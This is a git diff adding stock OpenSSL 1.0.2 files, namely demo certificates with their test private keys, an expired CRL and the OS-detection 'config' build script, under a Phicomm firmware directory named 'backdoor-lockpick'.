+vSLw9YUrJahcBHmbpvt494lF4gC5w3WPM+vXJofbusk4GoQEEsQNMDaah4m49uUq
+AylOVFJJJXuirVJ+o+0TtOFDITEAl+YZZariXOD7tdOSOl9RLMPC6+daHKS9e68u
+3enxhqnDGaAAMAkGBSsOAwIbBQADMAAwLQIVAJGVuFsG/0DBuSZ0jF7ypdU0/G0v
+AhQfeF5BoMMDbX/kidUVpQ6gadPlZA==
+-----END CERTIFICATE REQUEST-----
+-----BEGIN CERTIFICATE-----
+MIIBrjCCAWwCAQswCQYFKw4DAhsFADBTMQswCQYDVQQGEwJBVTETMBEGA1UECBMK
+U29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMQww
+CgYDVQQDEwNQQ0EwHhcNOTcwNjE1MDIxNDI5WhcNOTcwNzE1MDIxNDI5WjBSMQsw
+CQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJu
+ZXQgV2lkZ2l0cyBQdHkgTHRkMQswCQYDVQQDEwJDQTCBkjAJBgUrDgMCDAUAA4GE
+AAKBgBqmWXqKrP1etkWWTYYJVwH4qKHFacfsi4e9IvD1hSslqFwEeZum+3j3iUXi
+ALnDdY8z69cmh9u6yTgahAQSxA0wNpqHibj25SoDKU5UUkkle6KtUn6j7RO04UMh
+MQCX5hllquJc4Pu105I6X1Esw8Lr51ocpL17ry7d6fGGqcMZMAkGBSsOAwIbBQAD
+MQAwLgIVAJ4wtQsANPxHo7Q4IQZYsL12SKdbAhUAjJ9n38zxT+iai2164xS+LIfa
+C1Q=
+-----END CERTIFICATE-----
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/dsa-pca.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/dsa-pca.pem
new file mode 100644
index 0000000..e3641ad
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/dsa-pca.pem
@@ -0,0 +1,49 @@
+-----BEGIN DSA PRIVATE KEY-----
+Proc-Type: 4,ENCRYPTED
+DEK-Info: DES-EDE3-CBC,F80EEEBEEA7386C4
+
+GZ9zgFcHOlnhPoiSbVi/yXc9mGoj44A6IveD4UlpSEUt6Xbse3Fr0KHIUyQ3oGnS
+mClKoAp/eOTb5Frhto85SzdsxYtac+X1v5XwdzAMy2KowHVk1N8A5jmE2OlkNPNt
+of132MNlo2cyIRYaa35PPYBGNCmUm7YcYS8O90YtkrQZZTf4+2C4kllhMcdkQwkr
+FWSWC8YOQ7w0LHb4cX1FejHHom9Nd/0PN3vn3UyySvfOqoR7nbXkrpHXmPIr0hxX
+RcF0aXcV/CzZ1/nfXWQf4o3+oD0T22SDoVcZY60IzI0oIc3pNCbDV3uKNmgekrFd
+qOUJ+QW8oWp7oefRx62iBfIeC8DZunohMXaWAQCU0sLQOR4yEdeUCnzCSywe0bG1
+diD0KYaEe+Yub1BQH4aLsBgDjardgpJRTQLq0DUvw0/QGO1irKTJzegEDNVBKrVn
+V4AHOKT1CUKqvGNRP1UnccUDTF6miOAtaj/qpzra7sSk7dkGBvIEeFoAg84kfh9h
+hVvF1YyzC9bwZepruoqoUwke/WdNIR5ymOVZ/4Liw0JdIOcq+atbdRX08niqIRkf
+dsZrUj4leo3zdefYUQ7w4N2Ns37yDFq7
+-----END DSA PRIVATE KEY-----
+-----BEGIN CERTIFICATE REQUEST-----
+MIICVTCCAhMCAQAwUzELMAkGA1UEBhMCQVUxEzARBgNVBAgTClNvbWUtU3RhdGUx
+ITAfBgNVBAoTGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDEMMAoGA1UEAxMDUENB
+MIIBtTCCASkGBSsOAwIMMIIBHgKBgQCnP26Fv0FqKX3wn0cZMJCaCR3aajMexT2G
+lrMV4FMuj+BZgnOQPnUxmUd6UvuF5NmmezibaIqEm4fGHrV+hktTW1nPcWUZiG7O
+Zq5riDb77Cjcwtelu+UsOSZL2ppwGJU3lRBWI/YV7boEXt45T/23Qx+1pGVvzYAR
+5HCVW1DNSQIVAPcHMe36bAYD1YWKHKycZedQZmVvAoGATd9MA6aRivUZb1BGJZnl
+aG8w42nh5bNdmLsohkj83pkEP1+IDJxzJA0gXbkqmj8YlifkYofBe3RiU/xhJ6h6
+kQmdtvFNnFQPWAbuSXQHzlV+I84W9srcWmEBfslxtU323DQph2j2XiCTs9v15Als
+QReVkusBtXOlan7YMu0OArgDgYUAAoGBAKbtuR5AdW+ICjCFe2ixjUiJJzM2IKwe
+6NZEMXg39+HQ1UTPTmfLZLps+rZfolHDXuRKMXbGFdSF0nXYzotPCzi7GauwEJTZ
+yr27ZZjA1C6apGSQ9GzuwNvZ4rCXystVEagAS8OQ4H3D4dWS17Zg31ICb5o4E5r0
+z09o/Uz46u0VoAAwCQYFKw4DAhsFAAMxADAuAhUArRubTxsbIXy3AhtjQ943AbNB
+nSICFQCu+g1iW3jwF+gOcbroD4S/ZcvB3w==
+-----END CERTIFICATE REQUEST-----
+-----BEGIN CERTIFICATE-----
+MIIC0zCCApECAQAwCQYFKw4DAhsFADBTMQswCQYDVQQGEwJBVTETMBEGA1UECBMK
+U29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMQww
+CgYDVQQDEwNQQ0EwHhcNOTcwNjE0MjI1NDQ1WhcNOTcwNzE0MjI1NDQ1WjBTMQsw
+CQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJu
+ZXQgV2lkZ2l0cyBQdHkgTHRkMQwwCgYDVQQDEwNQQ0EwggG1MIIBKQYFKw4DAgww
+ggEeAoGBAKc/boW/QWopffCfRxkwkJoJHdpqMx7FPYaWsxXgUy6P4FmCc5A+dTGZ
+R3pS+4Xk2aZ7OJtoioSbh8YetX6GS1NbWc9xZRmIbs5mrmuINvvsKNzC16W75Sw5
+JkvamnAYlTeVEFYj9hXtugRe3jlP/bdDH7WkZW/NgBHkcJVbUM1JAhUA9wcx7fps
+BgPVhYocrJxl51BmZW8CgYBN30wDppGK9RlvUEYlmeVobzDjaeHls12YuyiGSPze
+mQQ/X4gMnHMkDSBduSqaPxiWJ+Rih8F7dGJT/GEnqHqRCZ228U2cVA9YBu5JdAfO
+VX4jzhb2ytxaYQF+yXG1TfbcNCmHaPZeIJOz2/XkCWxBF5WS6wG1c6Vqftgy7Q4C
+uAOBhQACgYEApu25HkB1b4gKMIV7aLGNSIknMzYgrB7o1kQxeDf34dDVRM9OZ8tk
+umz6tl+iUcNe5EoxdsYV1IXSddjOi08LOLsZq7AQlNnKvbtlmMDULpqkZJD0bO7A
+29nisJfKy1URqABLw5DgfcPh1ZLXtmDfUgJvmjgTmvTPT2j9TPjq7RUwCQYFKw4D
+AhsFAAMxADAuAhUAvtv6AkMolix1Jvy3UnVEIUqdCUICFQC+jq8P49mwrY9oJ24n
+5rKUjNBhSg==
+-----END CERTIFICATE-----
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/e83ef475.0 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/e83ef475.0
new file mode 120000
index 0000000..120c6e9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/e83ef475.0
@@ -0,0 +1 @@
+pca-cert.pem
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/pca-cert.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/pca-cert.pem
new file mode 100644
index 0000000..9d754d4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/pca-cert.pem
@@ -0,0 +1,33 @@
+-----BEGIN CERTIFICATE-----
+MIIC5jCCAk+gAwIBAgIBADANBgkqhkiG9w0BAQQFADBcMQswCQYDVQQGEwJBVTET
+MBEGA1UECBMKUXVlZW5zbGFuZDEaMBgGA1UEChMRQ3J5cHRTb2Z0IFB0eSBMdGQx
+HDAaBgNVBAMTE1Rlc3QgUENBICgxMDI0IGJpdCkwHhcNOTkxMjAyMjEzNTQ4WhcN
+MDUwNzExMjEzNTQ4WjBcMQswCQYDVQQGEwJBVTETMBEGA1UECBMKUXVlZW5zbGFu
+ZDEaMBgGA1UEChMRQ3J5cHRTb2Z0IFB0eSBMdGQxHDAaBgNVBAMTE1Rlc3QgUENB
+ICgxMDI0IGJpdCkwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJ2haT/f5Zwy
+V+MiuSDjSR62adBoSiBB7Usty44lXqsp9RICw+DCCxpsn/CfxPEDXLLd4olsWXc6
+JRcxGynbYmnzk+Z6aIPPJQhK3CTvaqGnWKZsA1m+WaUIUqJCuNTK4N+7hMAGaf6S
+S3e9HVgEQ4a34gXJ7VQFVIBNV1EnZRWHAgMBAAGjgbcwgbQwHQYDVR0OBBYEFE0R
+aEcrj18q1dw+G6nJbsTWR213MIGEBgNVHSMEfTB7gBRNEWhHK49fKtXcPhupyW7E
+1kdtd6FgpF4wXDELMAkGA1UEBhMCQVUxEzARBgNVBAgTClF1ZWVuc2xhbmQxGjAY
+BgNVBAoTEUNyeXB0U29mdCBQdHkgTHRkMRwwGgYDVQQDExNUZXN0IFBDQSAoMTAy
+NCBiaXQpggEAMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEEBQADgYEAUa8B3pho
++Mvxeq9HsEzJxHIFQla05S5J/e/V+DQTYoKiRFchKPrDAdrzYSEvP3h4QJEtsNqQ
+JfOxg5M42uLFq7aPGWkF6ZZqZsYS+zA9IVT14g7gNA6Ne+5QtJqQtH9HA24st0T0
+Tga/lZ9M2ovImovaxSL/kRHbpCWcqWVxpOw=
+-----END CERTIFICATE-----
+-----BEGIN RSA PRIVATE KEY-----
+MIICXAIBAAKBgQCdoWk/3+WcMlfjIrkg40ketmnQaEogQe1LLcuOJV6rKfUSAsPg
+wgsabJ/wn8TxA1yy3eKJbFl3OiUXMRsp22Jp85PmemiDzyUIStwk72qhp1imbANZ
+vlmlCFKiQrjUyuDfu4TABmn+kkt3vR1YBEOGt+IFye1UBVSATVdRJ2UVhwIDAQAB
+AoGAba4fTtuap5l7/8ZsbE7Z1O32KJY4ZcOZukLOLUUhXxXduT+FTgGWujc0/rgc
+z9qYCLlNZHOouMYTgtSfYvuMuLZ11VIt0GYH+nRioLShE59Yy+zCRyC+gPigS1kz
+xvo14AsOIPYV14Tk/SsHyq6E0eTk7VzaIE197giiINUERPECQQDSKmtPTh/lRKw7
+HSZSM0I1mFWn/1zqrAbontRQY5w98QWIOe5qmzYyFbPXYT3d9BzlsMyhgiRNoBbD
+yvohSHXJAkEAwAHx6ezAZeWWzD5yXD36nyjpkVCw7Tk7TSmOceLJMWt1QcrCfqlS
+xA5jjpQ6Z8suU5DdtWAryM2sAir1WisYzwJAd6Zcx56jvAQ3xcPXsE6scBTVFzrj
+7FqZ6E+cclPzfLQ+QQsyOBE7bpI6e/FJppY26XGZXo3YGzV8IGXrt40oOQJALETG
+h86EFXo3qGOFbmsDy4pdP5nBERCu8X1xUCSfintiD4c2DInxgS5oGclnJeMcjTvL
+QjQoJCX3UJCi/OUO1QJBAKgcDHWjMvt+l1pjJBsSEZ0HX9AAIIVx0RQmbFGS+F2Q
+hhu5l77WnnZOQ9vvhV5u7NPCUF9nhU3jh60qWWO8mkc=
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/expired/ICE.crl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/expired/ICE.crl
new file mode 100644
index 0000000..21939e8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/expired/ICE.crl
@@ -0,0 +1,9 @@
+-----BEGIN X509 CRL-----
+MIIBNDCBnjANBgkqhkiG9w0BAQIFADBFMSEwHwYDVQQKExhFdXJvcGVhbiBJQ0Ut
+VEVMIFByb2plY3QxIDAeBgNVBAsTF0NlcnRpZmljYXRpb24gQXV0aG9yaXR5Fw05
+NzA2MDkxNDQyNDNaFw05NzA3MDkxNDQyNDNaMCgwEgIBChcNOTcwMzAzMTQ0MjU0
+WjASAgEJFw05NjEwMDIxMjI5MjdaMA0GCSqGSIb3DQEBAgUAA4GBAH4vgWo2Tej/
+i7kbiw4Imd30If91iosjClNpBFwvwUDBclPEeMuYimHbLOk4H8Nofc0fw11+U/IO
+KSNouUDcqG7B64oY7c4SXKn+i1MWOb5OJiWeodX3TehHjBlyWzoNMWCnYA8XqFP1
+mOKp8Jla1BibEZf14+/HqCi2hnZUiEXh
+-----END X509 CRL-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/config b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/config
new file mode 100755
index 0000000..77f730f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/config
@@ -0,0 +1,986 @@
+#!/bin/sh
+#
+# OpenSSL config: determine the operating system and run ./Configure
+#
+# "config -h" for usage information.
+#
+#          this is a merge of minarch and GuessOS from the Apache Group.
+#          Originally written by Tim Hudson <tjh@cryptsoft.com>.
+
+# Original Apache Group comments on GuessOS
+
+# Simple OS/Platform guesser. Similar to config.guess but
+# much, much smaller. Since it was developed for use with
+# Apache, it follows under Apache's regular licensing
+# with one specific addition: Any changes or additions
+# to this script should be Emailed to the Apache
+# group (apache@apache.org) in general and to
+# Jim Jagielski (jim@jaguNET.com) in specific.
+#
+# Be as similar to the output of config.guess/config.sub
+# as possible.
+
+PREFIX=""
+SUFFIX=""
+TEST="false"
+EXE=""
+
+# pick up any command line args to config
+for i
+do
+case "$i" in 
+-d*) PREFIX="debug-";;
+-t*) TEST="true";;
+-h*) TEST="true"; cat <<EOF
+Usage: config [options]
+ -d	Add a debug- prefix to machine choice.
+ -t	Test mode, do not run the Configure perl script.
+ -h	This help.
+
+Any other text will be passed to the Configure perl script.
+See INSTALL for instructions.
+
+EOF
+;;
+*) options=$options" $i" ;;
+esac
+done
+
+# First get uname entries that we use below
+
+[ "$MACHINE" ] || MACHINE=`(uname -m) 2>/dev/null` || MACHINE="unknown"
+[ "$RELEASE" ] || RELEASE=`(uname -r) 2>/dev/null` || RELEASE="unknown"
+[ "$SYSTEM" ] || SYSTEM=`(uname -s) 2>/dev/null`  || SYSTEM="unknown"
+[ "$BUILD" ] || VERSION=`(uname -v) 2>/dev/null` || VERSION="unknown"
+
+
+# Now test for ISC and SCO, since it is has a braindamaged uname.
+#
+# We need to work around FreeBSD 1.1.5.1 
+(
+XREL=`uname -X 2>/dev/null | grep "^Release" | awk '{print $3}'`
+if [ "x$XREL" != "x" ]; then
+    if [ -f /etc/kconfig ]; then
+	case "$XREL" in
+	    4.0|4.1)
+		    echo "${MACHINE}-whatever-isc4"; exit 0
+		;;
+	esac
+    else
+	case "$XREL" in
+	    3.2v4.2)
+		echo "whatever-whatever-sco3"; exit 0
+		;;
+	    3.2v5.0*)
+		echo "whatever-whatever-sco5"; exit 0
+		;;
+	    4.2MP)
+		case "x${VERSION}" in
+		    x2.0*) echo "whatever-whatever-unixware20"; exit 0 ;;
+		    x2.1*) echo "whatever-whatever-unixware21"; exit 0 ;;
+		    x2*)   echo "whatever-whatever-unixware2";  exit 0 ;;
+		esac
+		;;
+	    4.2)
+		echo "whatever-whatever-unixware1"; exit 0
+		;;
+	    5*)
+		case "x${VERSION}" in
+		    # We hardcode i586 in place of ${MACHINE} for the
+		    # following reason. The catch is that even though Pentium
+		    # is minimum requirement for platforms in question,
+		    # ${MACHINE} gets always assigned to i386. Now, problem
+		    # with i386 is that it makes ./config pass 386 to
+		    # ./Configure, which in turn makes make generate
+		    # inefficient SHA-1 (for this moment) code.
+		    x[678]*)  echo "i586-sco-unixware7"; exit 0 ;;
+		esac
+		;;
+	esac
+    fi
+fi
+# Now we simply scan though... In most cases, the SYSTEM info is enough
+#
+case "${SYSTEM}:${RELEASE}:${VERSION}:${MACHINE}" in
+    MPE/iX:*)
+	MACHINE=`echo "$MACHINE" | sed -e 's/-/_/g'`
+	echo "parisc-hp-MPE/iX"; exit 0
+	;;
+    A/UX:*)
+	echo "m68k-apple-aux3"; exit 0
+	;;
+
+    AIX:[3-9]:4:*)
+	echo "${MACHINE}-ibm-aix"; exit 0
+	;;
+
+    AIX:*:[5-9]:*)
+	echo "${MACHINE}-ibm-aix"; exit 0
+	;;
+
+    AIX:*)
+	echo "${MACHINE}-ibm-aix3"; exit 0
+	;;
+
+    BeOS:*:BePC)
+    if [ -e /boot/develop/headers/be/bone ]; then
+		echo "beos-x86-bone"; exit 0
+	else
+		echo "beos-x86-r5"; exit 0
+	fi
+	;;
+
+    dgux:*)
+	echo "${MACHINE}-dg-dgux"; exit 0
+	;;
+
+    HI-UX:*)
+	echo "${MACHINE}-hi-hiux"; exit 0
+	;;
+
+    HP-UX:*)
+	HPUXVER=`echo ${RELEASE}|sed -e 's/[^.]*.[0B]*//'`
+	case "$HPUXVER" in
+	    1[0-9].*)	# HPUX 10 and 11 targets are unified
+		echo "${MACHINE}-hp-hpux1x"; exit 0
+		;;
+	    *)
+		echo "${MACHINE}-hp-hpux"; exit 0
+		;;
+	esac
+	;;
+
+    IRIX:5.*)
+	echo "mips2-sgi-irix"; exit 0
+	;;
+
+    IRIX:6.*)
+	echo "mips3-sgi-irix"; exit 0
+	;;
+
+    IRIX64:*)
+	echo "mips4-sgi-irix64"; exit 0
+	;;
+
+    Linux:[2-9].*)
+	echo "${MACHINE}-whatever-linux2"; exit 0
+	;;
+
+    Linux:1.*)
+	echo "${MACHINE}-whatever-linux1"; exit 0
+	;;
+
+    GNU*)
+	echo "hurd-x86"; exit 0;
+	;;
+
+    LynxOS:*)
+	echo "${MACHINE}-lynx-lynxos"; exit 0
+	;;
+
+    BSD/OS:4.*)  # BSD/OS always says 386
+	echo "i486-whatever-bsdi4"; exit 0
+	;;
+
+    BSD/386:*:*:*486*|BSD/OS:*:*:*:*486*)
+        case `/sbin/sysctl -n hw.model` in
+	    Pentium*)
+                echo "i586-whatever-bsdi"; exit 0
+                ;;
+            *)
+                echo "i386-whatever-bsdi"; exit 0
+                ;;
+            esac;
+	;;
+
+    BSD/386:*|BSD/OS:*)
+	echo "${MACHINE}-whatever-bsdi"; exit 0
+	;;
+
+    FreeBSD:*:*:*386*)
+        VERS=`echo ${RELEASE} | sed -e 's/[-(].*//'`
+        MACH=`sysctl -n hw.model`
+        ARCH='whatever'
+        case ${MACH} in
+           *386*       ) MACH="i386"     ;;
+           *486*       ) MACH="i486"     ;;
+           Pentium\ II*) MACH="i686"     ;;
+           Pentium*    ) MACH="i586"     ;;
+           *           ) MACH="$MACHINE" ;;
+        esac
+        case ${MACH} in
+           i[0-9]86 ) ARCH="pc" ;;
+        esac
+        echo "${MACH}-${ARCH}-freebsd${VERS}"; exit 0
+        ;;
+
+    FreeBSD:*)
+	echo "${MACHINE}-whatever-freebsd"; exit 0
+	;;
+
+    NetBSD:*:*:*386*)
+        echo "`(/usr/sbin/sysctl -n hw.model || /sbin/sysctl -n hw.model) | sed 's,.*\(.\)86-class.*,i\186,'`-whatever-netbsd"; exit 0
+	;;
+
+    NetBSD:*)
+	echo "${MACHINE}-whatever-netbsd"; exit 0
+	;;
+
+    OpenBSD:*)
+	echo "${MACHINE}-whatever-openbsd"; exit 0
+	;;
+
+    OpenUNIX:*)
+	echo "${MACHINE}-unknown-OpenUNIX${VERSION}"; exit 0
+	;;
+
+    OSF1:*:*:*alpha*)
+	OSFMAJOR=`echo ${RELEASE}| sed -e 's/^V\([0-9]*\)\..*$/\1/'`
+	case "$OSFMAJOR" in
+	    4|5)
+		echo "${MACHINE}-dec-tru64"; exit 0
+		;;
+	    1|2|3)
+		echo "${MACHINE}-dec-osf"; exit 0
+		;;
+	    *)
+		echo "${MACHINE}-dec-osf"; exit 0
+		;;
+	esac
+	;;
+
+    QNX:*)
+	case "$RELEASE" in
+	    4*)
+		echo "${MACHINE}-whatever-qnx4"
+		;;
+	    6*)
+		echo "${MACHINE}-whatever-qnx6"
+		;;
+	    *)
+		echo "${MACHINE}-whatever-qnx"
+		;;
+	esac
+	exit 0
+	;;
+
+    Paragon*:*:*:*)
+	echo "i860-intel-osf1"; exit 0
+	;;
+
+    Rhapsody:*)
+	echo "ppc-apple-rhapsody"; exit 0
+	;;
+
+    Darwin:*)
+	case "$MACHINE" in
+	    Power*)
+		echo "ppc-apple-darwin${VERSION}"
+		;;
+	    *)
+		echo "i686-apple-darwin${VERSION}"
+		;;
+	esac
+	exit 0
+	;;
+
+    SunOS:5.*)
+	echo "${MACHINE}-whatever-solaris2"; exit 0
+	;;
+
+    SunOS:*)
+	echo "${MACHINE}-sun-sunos4"; exit 0
+	;;
+
+    UNIX_System_V:4.*:*)
+	echo "${MACHINE}-whatever-sysv4"; exit 0
+	;;
+
+    VOS:*:*:i786)
+     echo "i386-stratus-vos"; exit 0
+     ;;
+
+    VOS:*:*:*)
+     echo "hppa1.1-stratus-vos"; exit 0
+     ;;
+
+    *:4*:R4*:m88k)
+	echo "${MACHINE}-whatever-sysv4"; exit 0
+	;;
+
+    DYNIX/ptx:4*:*)
+	echo "${MACHINE}-whatever-sysv4"; exit 0
+	;;
+
+    *:4.0:3.0:3[34]?? | *:4.0:3.0:3[34]??,*)
+	echo "i486-ncr-sysv4"; exit 0
+	;;
+
+    ULTRIX:*)
+	echo "${MACHINE}-unknown-ultrix"; exit 0
+	;;
+
+    SINIX*|ReliantUNIX*)
+	echo "${MACHINE}-siemens-sysv4"; exit 0
+	;;
+
+    POSIX-BC*)
+	echo "${MACHINE}-siemens-sysv4"; exit 0   # Here, $MACHINE == "BS2000"
+	;;
+
+    machten:*)
+       echo "${MACHINE}-tenon-${SYSTEM}"; exit 0;
+       ;;
+
+    library:*)
+	echo "${MACHINE}-ncr-sysv4"; exit 0
+	;;
+
+    ConvexOS:*:11.0:*)
+	echo "${MACHINE}-v11-${SYSTEM}"; exit 0;
+	;;
+
+    NEWS-OS:4.*)
+	echo "mips-sony-newsos4"; exit 0;
+	;;
+
+    MINGW*)
+	echo "${MACHINE}-whatever-mingw"; exit 0;
+	;;
+    CYGWIN*)
+	case "$RELEASE" in
+	    [bB]*|1.0|1.[12].*)
+		echo "${MACHINE}-whatever-cygwin_pre1.3"
+		;;
+	    *)
+		echo "${MACHINE}-whatever-cygwin"
+		;;
+	esac
+	exit 0
+	;;
+
+    *"CRAY T3E")
+       echo "t3e-cray-unicosmk"; exit 0;
+       ;;
+
+    *CRAY*)
+       echo "j90-cray-unicos"; exit 0;
+       ;;
+
+    NONSTOP_KERNEL*)
+       echo "nsr-tandem-nsk"; exit 0;
+       ;;
+
+    vxworks*)
+       echo "${MACHINE}-whatever-vxworks"; exit 0;
+       ;;
+esac
+
+#
+# Ugg. These are all we can determine by what we know about
+# the output of uname. Be more creative:
+#
+
+# Do the Apollo stuff first. Here, we just simply assume
+# that the existance of the /usr/apollo directory is proof
+# enough
+if [ -d /usr/apollo ]; then
+    echo "whatever-apollo-whatever"
+    exit 0
+fi
+
+# Now NeXT
+ISNEXT=`hostinfo 2>/dev/null`
+case "$ISNEXT" in
+    *'NeXT Mach 3.3'*)
+	echo "whatever-next-nextstep3.3"; exit 0
+	;;
+    *NeXT*)
+	echo "whatever-next-nextstep"; exit 0
+	;;
+esac
+
+# At this point we gone through all the one's
+# we know of: Punt
+
+echo "${MACHINE}-whatever-${SYSTEM}" 
+exit 0
+) 2>/dev/null | (
+
+# ---------------------------------------------------------------------------
+# this is where the translation occurs into SSLeay terms
+# ---------------------------------------------------------------------------
+
+# Only set CC if not supplied already
+if [ -z "$CROSS_COMPILE$CC" ]; then
+  GCCVER=`sh -c "gcc -dumpversion" 2>/dev/null`
+  if [ "$GCCVER" != "" ]; then
+    # then strip off whatever prefix egcs prepends the number with...
+    # Hopefully, this will work for any future prefixes as well.
+    GCCVER=`echo $GCCVER | LC_ALL=C sed 's/^[a-zA-Z]*\-//'`
+    # Since gcc 3.1 gcc --version behaviour has changed.  gcc -dumpversion
+    # does give us what we want though, so we use that.  We just just the
+    # major and minor version numbers.
+    # peak single digit before and after first dot, e.g. 2.95.1 gives 29
+    GCCVER=`echo $GCCVER | sed 's/\([0-9]\)\.\([0-9]\).*/\1\2/'`
+    CC=gcc
+  else
+    CC=cc
+  fi
+fi
+GCCVER=${GCCVER:-0}
+if [ "$SYSTEM" = "HP-UX" ];then
+  # By default gcc is a ILP32 compiler (with long long == 64).
+  GCC_BITS="32"
+  if [ $GCCVER -ge 30 ]; then
+    # PA64 support only came in with gcc 3.0.x.
+    # We check if the preprocessor symbol __LP64__ is defined...
+    if echo "__LP64__" | gcc -v -E -x c - 2>/dev/null | grep "^__LP64__" 2>&1 > /dev/null; then
+      : # __LP64__ has slipped through, it therefore is not defined
+    else
+      GCC_BITS="64"
+    fi
+  fi
+fi
+if [ "$SYSTEM" = "SunOS" ]; then
+  if [ $GCCVER -ge 30 ]; then
+    # 64-bit ABI isn't officially supported in gcc 3.0, but it appears
+    # to be working, at the very least 'make test' passes...
+    if gcc -v -E -x c /dev/null 2>&1 | grep __arch64__ > /dev/null; then
+      GCC_ARCH="-m64"
+    else
+      GCC_ARCH="-m32"
+    fi
+  fi
+  # check for WorkShop C, expected output is "cc: blah-blah C x.x"
+  CCVER=`(cc -V 2>&1) 2>/dev/null | \
+  	egrep -e '^cc: .* C [0-9]\.[0-9]' | \
+	sed 's/.* C \([0-9]\)\.\([0-9]\).*/\1\2/'`
+  CCVER=${CCVER:-0}
+  if [ $MACHINE != i86pc -a $CCVER -gt 40 ]; then
+    CC=cc	# overrides gcc!!!
+    if [ $CCVER -eq 50 ]; then
+      echo "WARNING! Detected WorkShop C 5.0. Do make sure you have"
+      echo "         patch #107357-01 or later applied."
+      sleep 5
+    fi
+  fi
+fi
+
+if [ "${SYSTEM}-${MACHINE}" = "Linux-alpha" ]; then
+  # check for Compaq C, expected output is "blah-blah C Vx.x"
+  CCCVER=`(ccc -V 2>&1) 2>/dev/null | \
+	egrep -e '.* C V[0-9]\.[0-9]' | \
+	sed 's/.* C V\([0-9]\)\.\([0-9]\).*/\1\2/'`
+  CCCVER=${CCCVER:-0}
+  if [ $CCCVER -gt 60 ]; then
+    CC=ccc	# overrides gcc!!! well, ccc outperforms inoticeably
+		# only on hash routines and des, otherwise gcc (2.95)
+		# keeps along rather tight...
+  fi
+fi
+
+if [ "${SYSTEM}" = "AIX" ]; then	# favor vendor cc over gcc
+    (cc) 2>&1 | grep -iv "not found" > /dev/null && CC=cc
+fi
+
+CCVER=${CCVER:-0}
+
+# read the output of the embedded GuessOS 
+read GUESSOS
+
+echo Operating system: $GUESSOS
+
+# now map the output into SSLeay terms ... really should hack into the
+# script above so we end up with values in vars but that would take
+# more time that I want to waste at the moment
+case "$GUESSOS" in
+  uClinux*64*)
+    OUT=uClinux-dist64
+	;;
+  uClinux*)
+    OUT=uClinux-dist
+	;;
+  mips2-sgi-irix)
+	CPU=`(hinv -t cpu) 2>/dev/null | head -1 | sed 's/^CPU:[^R]*R\([0-9]*\).*/\1/'`
+	CPU=${CPU:-0}
+	if [ $CPU -ge 4000 ]; then
+		options="$options -mips2"
+	fi
+	OUT="irix-$CC"
+	;;
+  mips3-sgi-irix)
+	#CPU=`(hinv -t cpu) 2>/dev/null | head -1 | sed 's/^CPU:[^R]*R\([0-9]*\).*/\1/'`
+	#CPU=${CPU:-0}
+	#if [ $CPU -ge 5000 ]; then
+	#	options="$options -mips4"
+	#else
+	#	options="$options -mips3"
+	#fi
+	OUT="irix-mips3-$CC"
+	;;
+  mips4-sgi-irix64)
+	echo "WARNING! If you wish to build 64-bit library, then you have to"
+	echo "         invoke './Configure irix64-mips4-$CC' *manually*."
+	if [ "$TEST" = "false" -a -t 1 ]; then
+	  echo "         You have about 5 seconds to press Ctrl-C to abort."
+	  (trap "stty `stty -g`" 2 0; stty -icanon min 0 time 50; read waste) <&1
+	fi
+        #CPU=`(hinv -t cpu) 2>/dev/null | head -1 | sed 's/^CPU:[^R]*R\([0-9]*\).*/\1/'`
+        #CPU=${CPU:-0}
+        #if [ $CPU -ge 5000 ]; then
+        #        options="$options -mips4"
+        #else
+        #        options="$options -mips3"
+        #fi
+	OUT="irix-mips3-$CC"
+	;;
+  ppc-apple-rhapsody) OUT="rhapsody-ppc-cc" ;;
+  ppc-apple-darwin*)
+	ISA64=`(sysctl -n hw.optional.64bitops) 2>/dev/null`
+	if [ "$ISA64" = "1" -a -z "$KERNEL_BITS" ]; then
+	    echo "WARNING! If you wish to build 64-bit library, then you have to"
+	    echo "         invoke './Configure darwin64-ppc-cc' *manually*."
+	    if [ "$TEST" = "false" -a -t 1 ]; then
+	      echo "         You have about 5 seconds to press Ctrl-C to abort."
+	      (trap "stty `stty -g`" 2 0; stty -icanon min 0 time 50; read waste) <&1
+	    fi
+	fi
+	if [ "$ISA64" = "1" -a "$KERNEL_BITS" = "64" ]; then
+	    OUT="darwin64-ppc-cc"
+	else
+	    OUT="darwin-ppc-cc"
+	fi ;;
+  i?86-apple-darwin*)
+	ISA64=`(sysctl -n hw.optional.x86_64) 2>/dev/null`
+	if [ "$ISA64" = "1" -a -z "$KERNEL_BITS" ]; then
+	    echo "WARNING! If you wish to build 64-bit library, then you have to"
+	    echo "         invoke './Configure darwin64-x86_64-cc' *manually*."
+	    if [ "$TEST" = "false" -a -t 1 ]; then
